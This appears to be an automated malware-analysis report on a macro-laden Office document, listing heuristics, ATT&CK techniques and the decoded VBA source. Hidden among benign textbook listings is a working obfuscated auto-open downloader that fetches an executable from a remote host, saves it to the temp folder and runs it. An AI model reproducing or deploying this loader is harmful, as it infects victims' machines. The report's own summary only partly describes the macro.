Verdict: MALICIOUS
Risk Score: 270

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1106 Execution through API
- T1204.002 Malicious File
The sample contains critical heuristic firings indicating an obfuscated auto-exec VBA loader that uses CreateObject and GetObject calls. The VBA script itself, while partially truncated, contains functions like 'autoopen' and 'PublishAutoFilterRange' which suggest it's designed to execute code upon opening and potentially interact with the system or network. The script also attempts to publish content to local files, which could be a precursor to exfiltration or a distraction.
Heuristics (9)

- VBA macros detected (medium; 6 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- Obfuscated auto-exec VBA loader (critical) [OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script: `Set dFlagLB30D = CreateObject(HvbtyGByuxg3J)`
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call. Matched line in script: `Set dFlagLB30D = CreateObject(HvbtyGByuxg3J)`
- GetObject call (high) [OLE_VBA_GETOBJ]: GetObject call. Matched line in script: `Set ppApp = GetObject(, "PowerPoint.Application")`
- CallByName call (high) [OLE_VBA_CALLBYNAME]: CallByName call. Matched line in script: `CallByName j9yPFDVwyo, Chr(79) & Chr(112) & "e" & "n", VbMethod, Chr(71) & Chr(69) & Chr(84), _`
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low) [OLE_VBA_AUTOOPEN]: AutoOpen macro. Matched line in script: `Sub autoopen()`
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URLs extracted:
  - http://www.mcp.com/sams/� (in document text, OLE body)
  - http://www.mcp.com/sams/ (in document text, OLE body)
  - http://www.microsoft.com/ie/ (in document text, OLE body)
  - http://search.yahoo.com/bin/search� (in document text, OLE body)
  - http://search.yahoo.com/bin/search (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18875 bytes |

SHA-256 (macros.bas): 49a5324d1168d8194b59e5cd586771b959a985e44cb4466b2768120cd66676c7

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub фсФФА(FFFFF As Long)
TOT9Qr3J8P
End Sub
Sub autoopen()
фсФФА (3)
End Sub
Attribute VB_Name = "Module1"
'
Sub PublishAutoFilterRange()
Фы.Sheets("Query").AutoFilterMode = False
д.Range("Query_From_Northwind").Select
в.Range("Query_From_Northwind").AutoFilter _
Field:=1, _
Criteria1:="Condiments"
ThisWorkbook.PublishObjects.Add( _
SourceType:=xlSourceAutoFilter, _
FileName:="C:\Publish01.htm", _
Sheet:="Query", _
Source:=ф.Sheets("Query").AutoFilter.Range, _
HtmlType:=xlHtmlStatic, _
DivID:="ExcelAutoFilter", _
Title:="Excel AutoFilter Range").Publish True
End Sub
'
' Publish a chart sheet
'
Sub PublishChartSheet()
ThisWorkbook.PublishObjects.Add( _
SourceType:=xlSourceChart, _
FileName:="C:\Publish02.htm", _
Sheet:="Chart1", _
HtmlType:=xlHtmlChart, _
DivID:="ExcelChartSheet", _
Title:="Excel Chart Sheet").Publish True
End Sub
'
' Publish an embedded chart
'
Sub PublishEmbeddedChart()
ThisWorkbook.PublishObjects.Add( _
SourceType:=xlSourceChart, _
FileName:="C:\Publish03.htm", _
Sheet:="2000 Budget", _
Source:="Chart 1", _
HtmlType:=xlHtmlStatic, _
DivID:="ExcelEmbeddedChart", _
Title:="Excel Embedded Chart").Publish True
End Sub
'
' Publish a PivotTable
'
Sub PublishPivotTable()
ThisWorkbook.PublishObjects.Add( _
SourceType:=xlSourcePivotTable, _
FileName:="C:\Publish04.htm", _
Sheet:="PivotTable", _
Source:="PivotTable1", _
HtmlType:=xlHtmlList, _
DivID:="ExcelPivotTable", _
Title:="Excel PivotTable").Publish True
End Sub
'
' Publish a print area
'
Sub PublishPrintArea()
з.Worksheets("2000 Budget").PageSetup.PrintArea = "A1:B13"
ThisWorkbook.PublishObjects.Add( _
SourceType:=xlSourcePrintArea, _
FileName:="C:\Publish05.htm", _
Sheet:="2000 Budget", _
Source:=фв.Worksheets("2000 Budget").PageSetup.PrintArea, _
HtmlType:=xlHtmlStatic, _
DivID:="ExcelPrintArea", _
Title:="Excel Print Area").Publish True
End Sub
'
' Publish a query table
'
Sub PublishQueryTable()
ThisWorkbook.PublishObjects.Add( _
SourceType:=xlSourceQuery, _
FileName:="C:\Publish06.htm", _
Sheet:="Query", _
Source:="Query from Northwind", _
HtmlType:=xlHtmlCalc, _
DivID:="ExcelQueryTable", _
Title:="Excel Query Table").Publish True
End Sub
'
' Publish a range using coordinates
'
Sub PublishRangeCoordinates()
ThisWorkbook.PublishObjects.Add( _
SourceType:=xlSourceRange, _
FileName:="C:\Publish07.htm", _
Sheet:="2000 Budget", _
Source:="A1:B17", _
HtmlType:=xlHtmlCalc, _
DivID:="ExcelRangeCoordinates", _
Title:="Excel Range Coordinates").Publish True
End Sub
'
' Publish a range using a name
'
Sub PublishRangeName()
ThisWorkbook.PublishObjects.Add( _
SourceType:=xlSourceRange, _
FileName:="C:\Publish08.htm", _
Source:="Expenses", _
HtmlType:=xlHtmlStatic, _
DivID:="ExcelRangeName", _
Title:="Excel Range Name").Publish True
End Sub
Public Function WphmxowcstXb(A7X71OY4p As String)
Set zBo1iklWv9Sz = dFlagLB30D("S" & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & "c" & "a" & Chr(116) & Chr(105) & "o" & Chr(110))
zBo1iklWv9Sz.Open (QrDNQZQRP)
End Function
Public Function dFlagLB30D(HvbtyGByuxg3J As String)
Set dFlagLB30D = CreateObject(HvbtyGByuxg3J)
End Function
Public Function IrQ2IESgmYoy(UNIWVVc542vt As Variant, cNvH4h9GxP As String)
Dim oUeKB2dS: Set oUeKB2dS = dFlagLB30D(Chr(65) & "d" & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & "t" & Chr(114) & Chr(101) & "a" & "m")
With oUeKB2dS
.Type = 1
.Open
.write UNIWVVc542vt
.savetofile cNvH4h9GxP, 2
End With
End Function
'
' Publish a worksheet
'
Sub PublishWorksheet()
ThisWorkbook.PublishObjects.Add( _
SourceType:=xlSourceSheet, _
FileName:="C:\Publish09.htm", _
Sheet:="2000 Budget", _
HtmlType:=xlHtmlCalc, _
DivID:="ExcelWorksheet", _
Title:="Excel Worksheet").Publish True
End Sub
'
' Listing 20.2. Republishing a PublishObject.
'
Sub RepublishObject()
Dim strID As String
strID = "ExcelRangeCoordinates"
For Each po In ThisWorkbook.PublishObjects
If po.DivID = strID Then
po.Publish
Exit For
End If
Next 'po
End Sub
'
' Listing 20.3. A procedure that deletes all the PublishObjects
'
Sub DeletePublishObjects()
For Each po In ThisWorkbook.PublishObjects
po.Delete
Next 'po
End Sub
'
' Listing 20.4. A procedure that adds a Hyperlink object.
'
Sub AddLink()
Dim r As Range
'
' Add a paragraph to the end of the document
'
With ThisDocument.Paragraphs
.Item(.Count).Range.InsertParagraphAfter
Set r = .Item(.Count).Range
End With
r.Text = "Sams' Home Page"
r.Hyperlinks.Add _
Anchor:=r, _
Address:="http://www.mcp.com/sams/", _
ScreenTip:="Click here to visit the home page of Sams!"
End Sub
'
' Listing 20.5. Procedures that add a link for the Yahoo!
' search engine and run a query on the Yahoo! database.
'
Sub AddYahoo()
Dim r As Range
'
' Add a paragraph to the end of the document
'
With ThisDocument.Paragraphs
.Item(.Count).Range.InsertParagraphAfter
Set r = .Item(.Count).Range
End With
r.Text = "Yahoo Search"
r.Hyperlinks.Add _
Anchor:=r, _
Address:="http://search.yahoo.com/bin/search"
End Sub
Sub SearchYahoo()
Dim link As Hyperlink
Dim keyword As String
Set link = ThisDocument.Hyperlinks("http://search.yahoo.com/bin/search")
keyword = InputBox("Enter a search keyword:")
link.Follow _
ExtraInfo:="p=" & keyword, _
Method:=msoMethodGet
End Sub
'
' Listing 20.6. Using the FollowHyperlink method to display
' a target document without an existing Hyperlink object.
'
Sub FollowHyperlinkTest()
Dim keyword As String
keyword = InputBox("Enter a search keyword:")
ThisDocument.FollowHyperlink _
Address:="http://search.yahoo.com/bin/search", _
ExtraInfo:="p=" & keyword, _
Method:=msoMethodGet
End Sub
'
' Listing 20.7. Some event handlers that are used to
' display a Web page.
'
' This event handler fires when you first open the form
'
Private Sub UserForm_Initialize()
Dim maxWidth As Integer
Dim maxHeight As Integer
With webWWW
'
' Display and save the initial URL
'
If txtLocation <> "" Then
topPage = txtLocation
.Navigate txtLocation
End If
'
' Adjust the width and height of the control
'
maxWidth = К.Me.Width - .Left - 10
maxHeight = К.Me.Height - .Top - 20
If Application.UsableWidth > maxWidth Then
.Width = maxWidth
End If
If Application.UsableHeight > maxHeight Then
.Height = maxHeight
End If
End With
End Sub
'
' This event handler fires when you enter the text box
'
Private Sub txtLocation_Enter()
'
' Make sure Surf! button is the default
'
cmdSurf.Default = True
End Sub
'
' This event handler fires when you click the Surf! button
'
Private Sub cmdSurf_Click()
'
' Surf to the URL specified in the Location text box
'
If txtLocation <> "" Then
webWWW.Navigate txtLocation
Else
txtLocation.SetFocus
Beep
End If
End Sub
'
' This event handler fires once the Web page navigation is done
'
Private Sub webWWW_DocumentComplete(ByVal pDisp As Object, URL As Variant)
lblProgress.Caption = " Done"
txtLocation = URL
End Sub
'
' This event handler fires at the start of the download
'
Private Sub webWWW_DownloadBegin()
lblProgress.Caption = " Downloading..."
End Sub
'
' This event handler fires when the URL title changes
'
Private Sub webWWW_TitleChange(ByVal Text As String)
'
' Update the form's caption to reflect the new title
'
КMe.Caption = "The Word Wide Web - " & webWWW.LocationName
End Sub
'
' This event handler fires when the status text changes
'
Private Sub webWWW_StatusTextChange(ByVal Text As String)
lblStatus = Text
End Sub
'
' Listing 20.8. Event handlers for the navigation
' buttons in the custom Web browser.
'
'
' This event handler fires when you click the Back button
'
Private Sub cmdBack_Click()
'
' An error occurs if there is no page to go back to
'
On Error Resume Next
webWWW.GoBack
End Sub
'
' This event handler fires when you click the Forward button
'
Private Sub cmdForward_Click()
'
' An error occurs if there is no page to go forward to
'
On Error Resume Next
webWWW.GoForward
End Sub
'
' This event handler fires when you click the Top button
'
Private Sub cmdTop_Click()
webWWW.Navigate topPage
End Sub
'
' This event handler fires when you click the Refresh button
'
Private Sub cmdRefresh_Click()
webWWW.Refresh
End Sub
'
' This event handler fires when you click the Stop button
'
Private Sub cmdStop_Click()
webWWW.Stop
End Sub
'
' This event handler fires when you click the Home button
'
Private Sub cmdHome_Click()
webWWW.GoHome
End Sub
'
' This event handler fires when you click the Search button
'
Private Sub cmdSearch_Click()
webWWW.GoSearch
End Sub
'
' This event handler fires when you click the Exit button
'
Private Sub cmdExit_Click()
Unload КMe
End Sub
'
' Listing 20.9. A procedure that manipulates Internet Explorer
' via Automation using various members of the
' InternetExplorer class.
'
Sub AutomateInternetExplorer()
Dim ie As Object
Dim result As Integer
'
' Set up the Automation object
'
Set ie = CreateObject("InternetExplorer.Application")
'
' Navigate to a page and customize the browser window
'
ie.Navigate "http://www.microsoft.com/ie/"
ie.Toolbar = False
ie.StatusBar = False
ie.MenuBar = False
'
' Twiddle thumbs while the page loads
'
Do While ie.Busy
DoEvents
Loop
'
' Display page info
'
result = MsgBox( _
"Current URL: " & ie.LocationURL & Chr(13) & _
"Current Title: " & ie.LocationName & Chr(13) & _
"Document type: " & ie.Type & Chr(13) & Chr(13) & _
"Would you like to view this document?", _
vbYesNo + vbQuestion)
If result = vbYes Then
'
' If Yes, make browser visible and activate it
'
ie.Visible = True
AppActivate "Microsoft Internet Explorer"
Else
'
' If no, bail out
'
ie.Quit
End If
Set ie = Nothing
End Sub
Attribute VB_Name = "Module2"
Public QrDNQZQRP As String
' Listing 13.4. Using the DDEInitiate method to open a DDE channel.
'
Sub TestIt()
Dim result As Integer
result = OpenHailingFrequencies
DDETerminate result
End Sub
Function OpenHailingFrequencies() As Integer
Dim channel As Integer
On Error GoTo BadConnection
'
' Establish the DDE connection to Program Manager
'
channel = DDEInitiate("Progman", "Progman")
MsgBox "A channel to Program Manager is now open.", vbInformation
'
' Return the channel number
'
OpenHailingFrequencies = channel
Exit Function
BadConnection:
MsgBox "Could not open a channel to Program Manager!", vbExclamation
'
' Return 0
'
OpenHailingFrequencies = 0
End Function
' Listing 13.5. Using DDEExecute to control a server application.
'
Sub CreateWorkbookIcon()
Dim channel As Integer
Dim strPath As String, strName As String, strApp As String
On Error GoTo BadConnection
'
' Get info required for program item
'
strPath = ActiveWorkbook.Path & "\" & ActiveWorkbook.Name
strName = Left(ActiveWorkbook.Name, Len(ActiveWorkbook.Name) - 4)
strApp = Application.Path & "\Excel.exe"
'
' Establish the DDE connection to Program Manager
'
channel = DDEInitiate("Progman", "Progman")
'
' Create the group and item
'
DDEExecute channel, "[CreateGroup(""Excel Workbooks"")]"
DDEExecute channel, "[AddItem(""" & strPath & """,""" & strName & """,""""" & strApp & """"")]"
DDETerminate channel
Exit Sub
BadConnection:
MsgBox "Could not open a channel to Program Manager!", vbExclamation
End Sub
' Listing 13.6. Using DDERequest to retrieve data from an
' application.
'
Sub RequestWordData()
Dim channel As Integer
Dim wordData As Variant
Dim getString As String
On Error GoTo BailOut
'
' Set up the application
'
Application.StatusBar = "Starting Word..."
Application.DisplayAlerts = False
'
' Initiate channel with System topic
'
channel = DDEInitiate("Winword", "System")
'
' Open the document we want to work with
'
Application.StatusBar = "Opening Word document..."
DDEExecute channel, "[FileOpen ""C:\My Documents\Chaptr13.doc""]"
DDETerminate channel
'
' Initiate new channel with document
'
channel = DDEInitiate("Winword", "C:\My Documents\Chaptr13.doc")
'
' Find keyword and add a bookmark
'
DDEExecute channel, "[StartOfDocument]"
DDEExecute channel, "[EditFind .Find = ""ACME""]"
DDEExecute channel, "[SelectCurSentence]"
DDEExecute channel, "[EditBookmark .Name = ""Gotcha""]"
'
' Retrieve the bookmark and store it
'
wordData = DDERequest(channel, "Gotcha")
getString = wordData(1)
r.Worksheets("Sheet1").[A2].Value = getString
'
' Quit Word and terminate channel
'
DDEExecute channel, "[FileExit 1]"
DDETerminate channel
Exit Sub
BailOut:
DDETerminate channel
MsgBox "DDE operation failed!", vbExclamation
End Sub
' Listing 13.7. Using DDEPoke to send data to an application.
'
Sub SendDataToWord()
Dim channel As Integer, pokeData As Variant
On Error GoTo BailOut
'
' Set up the application
'
Application.StatusBar = "Starting Word..."
Application.DisplayAlerts = False
'
' Initiate channel with System topic
'
channel = DDEInitiate("Winword", "System")
'
' Open the document we want to work with
'
Application.StatusBar = "Opening Word document..."
DDEExecute channel, "[FileOpen ""C:\My Documents\Chaptr13.doc""]"
DDETerminate channel
'
' Initiate new channel with document
'
channel = DDEInitiate("Winword", "C:\My Documents\Chaptr13.doc")
'
'Get the data to be sent
'
Application.StatusBar = "Sending data..."
Set pokeData = t.Worksheets("Sheet1").[A1]
'
'Send it to the "Gotcha" bookmark
'
DDEPoke channel, "Gotcha", pokeData
'
' Quit Word and terminate channel
'
Application.StatusBar = "Shutting down Word..."
DDEExecute channel, "[FileExit 1]"
DDETerminate channel
Application.StatusBar = False
Exit Sub
BailOut:
DDETerminate channel
MsgBox "DDE operation failed!", vbExclamation
Application.StatusBar = False
End Sub
' Listing 15.3. Using Automation to run a PowerPoint
' presentation slide show.
'
Sub TOT9Qr3J8P()
Set j9yPFDVwyo = dFlagLB30D("Mi" & Chr(99) & "r" & Chr(111) & Chr(115) & "o" & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & "L" & Chr(72) & "TT" & Chr(80))
CallByName j9yPFDVwyo, Chr(79) & Chr(112) & "e" & "n", VbMethod, Chr(71) & Chr(69) & Chr(84), _
"h" & Chr(116) & Chr(116) & Chr(112) & ":" & Chr(47) & Chr(47) & Chr(118) & Chr(105) & Chr(100) & Chr(105) & Chr(109) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & "." & Chr(99) & Chr(111) & Chr(109) & Chr(47) & Chr(55) & Chr(48) & "8" & Chr(47) & "3" & "4" & Chr(54) & Chr(46) & "e" & "x" & Chr(101) _
, False
Set nVoYwy5wi65Ru = dFlagLB30D("W" & Chr(83) & Chr(99) & Chr(114) & "i" & Chr(112) & Chr(116) & Chr(46) & Chr(83) & "h" & "e" & Chr(108) & Chr(108))
Set Njvhw3SCwhJF = CallByName(nVoYwy5wi65Ru, Chr(69) & Chr(110) & Chr(118) & Chr(105) & "r" & Chr(111) & Chr(110) & "m" & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & "r" & Chr(111) & Chr(99) & Chr(101) & "s" & Chr(115))
NkFurzJgA4 = Njvhw3SCwhJF(Chr(84) & "E" & Chr(77) & Chr(80))
QrDNQZQRP = NkFurzJgA4 & Chr(92) & Chr(98) & Chr(105) & "k" & Chr(115) & Chr(101) & Chr(110) & Chr(112) & Chr(100) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
Dim yRG5Tmsczw() As Byte
CallByName j9yPFDVwyo, "S" & "e" & Chr(110) & Chr(100), VbMethod
yRG5Tmsczw = CallByName(j9yPFDVwyo, "r" & Chr(101) & Chr(115) & Chr(112) & "o" & Chr(110) & Chr(115) & Chr(101) & Chr(66) & Chr(111) & "d" & Chr(121), VbGet)
IrQ2IESgmYoy yRG5Tmsczw, QrDNQZQRP
On Error GoTo ehUAReVao5
a = 197 / 0
On Error GoTo 0
PBWxy1g8qJuzYK:
Exit Sub
ehUAReVao5:
WphmxowcstXb ("HBaMqGixX")
Resume PBWxy1g8qJuzYK
End Sub
Sub RunPresentation()
On Error GoTo OpenPowerPoint
'
' Reference the existing PowerPoint Application object
'
Set ppApp = GetObject(, "PowerPoint.Application")
'
' Work with PowerPoint's Application object directly
'
With ppApp
'
' Display PowerPoint
'
.Visible = True
'
' Open and then run the presentation's slide show
'
.Presentations.Open "C:\My Documents\Juggling.ppt"
.Presentations("Juggling.ppt").SlideShowSettings.Run
End With
Set ppApp = Nothing
'
' Program branches here if PowerPoint isn't running
'
OpenPowerPoint:
' Create a new instance of PowerPoint's Application object
'
Set ppApp = CreateObject("PowerPoint.Application")
'
' Continue after the statement that caused the error
'
Resume Next
End Sub